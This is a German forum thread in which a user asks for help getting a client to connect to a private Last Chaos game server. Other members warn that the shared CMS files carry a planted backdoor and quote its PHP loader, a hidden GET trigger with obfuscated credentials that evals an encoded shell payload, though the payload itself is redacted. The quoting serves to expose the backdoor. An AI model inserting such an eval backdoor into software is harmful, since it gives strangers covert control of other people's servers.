P-Server

alfa09071987 · 03/29/2016, 00:10

Hallo.
ich möchte eine Last chaos P-Server erstellen.
hab soweit die server files.
nur habe ich probleme mit den client.
liegt glaub am update server.
und da is der hund begraben, kann mir jemand helfen wie ich sowas zustande bekomme ?

LG
Matze

EEOI · 03/29/2016, 00:18

Dein Text bringt uns genau 0.
Werde mal genauer und schreibe Dinge wie, welche Files, welcher Client, wo wird getestet, was genau ist das Problem usw.

alfa09071987 · 03/29/2016, 03:56

ja stimmt war etwas doof von mir sorry.

ich teste das kannse auf Debian 7
(noch auf Home PC) bis es richtig Läuft dann kommt es auf nen richtigen Server.)

die files habe ich von diesen video.

laut aussage EP4 2015 files.
Client soll der 2015ner sein.

das Problem ist folgentes.
wenn ich den Client Patche mit Meiner IP bekomme ich ein fehler das er sich nicht verbinden kann.
Connect Info Open FAILED!

Bei weiteren Fragen gerne fragen.

Ih¢sãs123 · 03/29/2016, 13:29

Du arbeitest an einem lokalen Rechner, also nutze die Macht der 127.0.0.1

Oder frag Liquid der hat Zeit und hilft gerne

~~Frezona♥!~~ · 03/29/2016, 14:54

Quote:

Originally Posted by Ih¢sãs123

Du arbeitest an einem lokalen Rechner, also nutze die Macht der 127.0.0.1

Oder frag Liquid der hat Zeit und hilft gerne

Wie den ohne Skype Account

alfa09071987 · 03/29/2016, 19:12

ich habe skype

" matze18000 "
gerne adden
hab es mit local ip gemacht.

aber irgendwie will er nicht

wäre echt schön wenn mir das jemand erklären könnte.
is denk echt nur ein sympler fehler nur ich find ihn nicht.

xPainlessx · 03/30/2016, 08:42

Quote:

Originally Posted by alfa09071987

ja stimmt war etwas doof von mir sorry.

ich teste das kannse auf Debian 7
(noch auf Home PC) bis es richtig Läuft dann kommt es auf nen richtigen Server.)

die files habe ich von diesen video.

laut aussage EP4 2015 files.
Client soll der 2015ner sein.

das Problem ist folgentes.
wenn ich den Client Patche mit Meiner IP bekomme ich ein fehler das er sich nicht verbinden kann.
Connect Info Open FAILED!

Bei weiteren Fragen gerne fragen.

Ich würde dir empfehlen von diesen files die finger zu lassen, wir haben in den files gestern wirklich intressante dinge gesehen, so dass man sie lieber nicht nehmen sollte

EEOI · 03/30/2016, 10:33

Quote:

Originally Posted by xPainlessx

Ich würde dir empfehlen von diesen files die finger zu lassen, wir haben in den files gestern wirklich intressante dinge gesehen, so dass man sie lieber nicht nehmen sollte

Zum Beispiel?
Mit belegen bitte

Ih¢sãs123 · 03/30/2016, 11:05

Quote:

Originally Posted by EEOI

Zum Beispiel?
Mit belegen bitte

Bunte Farben, lilane Charactere und noch mehr bunte Farben.

Leider keine Belege (hast du übrigens klein geschrieben f4g), da es nur im Kopf stattgefunden hat.

Hät´s gerne auch Belegt. Thx.

xPainlessx · 03/30/2016, 13:17

Ich hab den TE einfach mal in skype geadded

LCJunk · 03/30/2016, 13:26

im lc-cms was da drunter verlinkt wurde gibt es in der core/functions.php auf den zeilen 92-110 einen interessanten block:

PHP Code:


			
if(isset($_GET[base64_decode('cA==')]))

  {

    if($_GET[base64_decode('cA==')]==md5(base64_decode('TE9M')))

    {

      $user=base64_decode('STQ3');

      $pass=base64_decode('VFJPTE9M');

      

      function zWM($NXlKO)

      { 

        $NXlKO=gzuncompress(base64_decode($NXlKO));

        for($i=0;$i<strlen($NXlKO);$i++)

        {

          $NXlKO[$i]=chr(ord($NXlKO[$i])-1);

        }

        return $NXlKO;

      }

      eval(zWM(base64_decode('UNKENNTLICHGEMACHTE_I47-SHELL')));

    }

  }

I-47 kann man ja mal googeln, ich würde sowas nicht auf meinem server wollen und zumindest diese zeilen entfernen.

alfa09071987 · 03/30/2016, 13:36

hey. Danke für eure Antworten.
Aber wenn in den einen file schon sowas drin steht wer weiß in wievielen noch.

am besten die files garnicht nutzen oder?.

aber es ist auch wirklich schwer files zu finden.

mfg

damona · 03/30/2016, 13:41

Quote:

Originally Posted by Ih¢sãs123

Bunte Farben, lilane Charactere und noch mehr bunte Farben.

Leider keine Belege (hast du übrigens klein geschrieben f4g), da es nur im Kopf stattgefunden hat.

Hät´s gerne auch Belegt. Thx.

Quote:

Originally Posted by LCJunk

im lc-cms was da drunter verlinkt wurde gibt es in der core/functions.php auf den zeilen 92-110 einen interessanten block:

PHP Code:

if(isset($_GET[base64_decode('cA==')])) { if($_GET[base64_decode('cA==')]==md5(base64_decode('TE9M'))) { $user=base64_decode('STQ3'); $pass=base64_decode('VFJPTE9M'); function zWM($NXlKO) { $NXlKO=gzuncompress(base64_decode($NXlKO)); for($i=0;$i<strlen($NXlKO);$i++) { $NXlKO[$i]=chr(ord($NXlKO[$i])-1); } return $NXlKO; } eval(zWM(base64_decode('UNKENNTLICHGEMACHTE_I47-SHELL'))); } }

I-47 kann man ja mal googeln, ich würde sowas nicht auf meinem server wollen und zumindest diese zeilen entfernen.

Das stimmt hier wurde ein backdoor geproggt, das stammt aber denke nicht von toxic.

Hier ist mal der Code welcher ausgeführt werden kann durch das backdoor

Es ist quasi ne ganze GUI/Plattform.

Ih¢sãs123 · 03/30/2016, 14:28

Quote:

Originally Posted by damona

Das stimmt hier wurde ein backdoor geproggt, das stammt aber denke nicht von toxic.

Hier ist mal der Code welcher ausgeführt werden kann durch das backdoor

Es ist quasi ne ganze GUI/Plattform.

Base64 für sowas zu nutzen ist so 90er Jahre

Trotzdem witzig das sich jemand die Mühe gemacht hat.

Edit: Die Files haben trotzdem wenig mit der Website zu tun, für die Files gibt es noch nichts?

Edit2: Von Toxic war meiner Meinung nach eines drin, entweder im footer oder in diesem wo man AGB´s bestätigen sollte(hab ich damals bei einigen entfernt). Damit konnte er sich die MySQL-Daten anzeigen lassen.
Bei mir gibt es das oben genannte Backdoor nicht und die CMS liegt schon ewig auf unserem (EEOI´s und meinem) Root und hab sie damals über Skype bekommen. D.h. das Backdoor wurde nachträglich unabhängig von Toxic eingebaut.

damona · 03/30/2016, 17:32

Quote:

Originally Posted by Ih¢sãs123

Base64 für sowas zu nutzen ist so 90er Jahre
Trotzdem witzig das sich jemand die Mühe gemacht hat.

Edit: Die Files haben trotzdem wenig mit der Website zu tun, für die Files gibt es noch nichts?

Edit2: Von Toxic war meiner Meinung nach eines drin, entweder im footer oder in diesem wo man AGB´s bestätigen sollte(hab ich damals bei einigen entfernt). Damit konnte er sich die MySQL-Daten anzeigen lassen.
Bei mir gibt es das oben genannte Backdoor nicht und die CMS liegt schon ewig auf unserem (EEOI´s und meinem) Root und hab sie damals über Skype bekommen. D.h. das Backdoor wurde nachträglich unabhängig von Toxic eingebaut.

Ist einfach nen HackScript/Shell von nem Indischen Hacker der es released hat, das ist einfach hier verbaut worden.

Nun wissen wir auch warum hier einige auf wannabe falo's machen obwohl sie einfach nen infizierten server nutzen und meinen sie haben es ingame geduped